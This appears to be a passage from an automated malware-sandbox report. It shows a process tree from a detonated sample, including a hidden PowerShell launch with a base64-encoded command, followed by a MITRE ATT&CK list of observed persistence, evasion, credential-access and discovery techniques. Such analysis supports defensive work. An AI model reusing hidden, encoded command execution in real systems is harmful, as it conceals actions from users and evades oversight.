C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:7500

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Executes dropped EXE
PID:5552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:8344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:9160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:9516

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:8360

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4012

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery